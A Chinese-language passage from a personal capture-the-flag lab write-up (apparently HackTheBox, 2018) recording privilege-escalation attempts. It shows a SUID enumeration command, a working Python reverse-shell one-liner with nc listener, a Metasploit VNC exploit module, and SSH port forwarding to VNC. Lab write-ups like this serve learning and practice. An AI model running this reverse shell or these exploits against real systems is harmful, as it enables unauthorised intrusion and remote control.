-> nc: Permission denied

• Trying（SUID提权，参考）。
  find / -user root -perm -4000 -exec ls -ldb {} \;
  执行结果中，没有namp、vim、find等等可以提权的程序。

有意思的是，在连接过程中，ssh命令面板突然不灵了，无法输入任何命令。
重新连进去以后，我的readme.txt多了一行。。。看来遇到同道中人了。

• Trying：测试nc，用服务端连接kali。成功连接。
  

不是吧。。又连不上了，第一次遇到被人挤下线。

查看一下进程这些都是远程连进来的。。。

• Trying：太卡了，弹一个python shell。
  本地：nc -lvp 1234
  服务器：python ‐c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.198",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","‐i"]);'

• Trying :
  python -m SimpleHTTPServer 888

Traceback (most recent call last):
  File "/usr/local/lib/python2.7/runpy.py", line 174, in _run_module_as_main
    "__main__", fname, loader, pkg_name)
 。。。此处省略几十行
socket.error: [Errno 13] Permission denied

• Trying：

• Trying:
  尝试vnc远程命令执行
  

use exploit/multi/vnc/vnc_keyboard_exec
set RHOST
set PASSWORD

试了好多密码，包括里面secret文件。失败

2018.9.28.总结

writeup参考

SSH原理与运用（二）：远程操作与端口转发

通过绑定本地和远程的端口，就可以用vncviewer命令，使用密钥，开启vnc窗口
vncviewer -passwd secret 127.0.0.1:5901